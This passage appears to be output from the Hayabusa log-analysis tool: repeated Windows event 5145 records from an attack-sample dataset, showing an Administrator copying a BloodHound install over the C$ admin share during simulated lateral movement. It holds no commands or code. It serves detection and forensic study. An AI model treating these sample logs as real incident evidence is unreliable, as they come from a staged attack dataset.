Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\types\v1 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\node-ratify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\object-assign : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\once : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.058 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.068 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pako\lib\zlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-exists : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\path-is-absolute : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pify : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.078 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.088 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.098 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.108 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.119 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.139 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.149 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.159 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.169 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.179 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.189 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.199 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.209 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.219 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.229 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.239 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 